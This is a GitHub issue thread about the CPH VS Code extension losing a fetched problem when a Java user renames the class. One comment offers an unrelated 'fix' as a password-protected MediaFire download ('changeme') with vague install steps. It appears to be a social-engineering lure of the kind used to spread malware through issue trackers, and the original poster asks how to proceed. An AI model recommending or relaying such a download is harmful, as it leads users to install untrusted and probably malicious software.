### ISSUE TITLE
Java New Class problem

### ISSUE THREAD

**Issue by Aritradutta2002** [agrawal-d/cph#484]
<!-- Basically I write in Java and Solve problem from CodeForces and Code Chef like platforms. But the Issue is whenever I am using CPH tool in VSCODE , I have add a Class in Java but when I add Class name into it . The CPH is fetches problem vanishes and it creates  a new. Please feature to add automatic class with the Problem name for Java Users, I facing this problem please help me. Thank you.
![Screenshot (251)](https://github.com/user-attachments/assets/47b93416-e515-4c1c-b58d-45bcc5cc014f)
![Screenshot (252)](https://github.com/user-attachments/assets/f6b10857-2fb7-4e9c-8503-4bd5539debcc)

**Extension Version:** <Version 2.54.0>

**VS Code Version:** <Vs Code (1.92) >

**Browser Version:** <Chrome Version 127.0.6533.122 (Official Build) (64-bit)>

**Operating System:** <  Windows 10 (64 bit) >

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Aritradutta2002** [comment]
After downloading what I will do next??
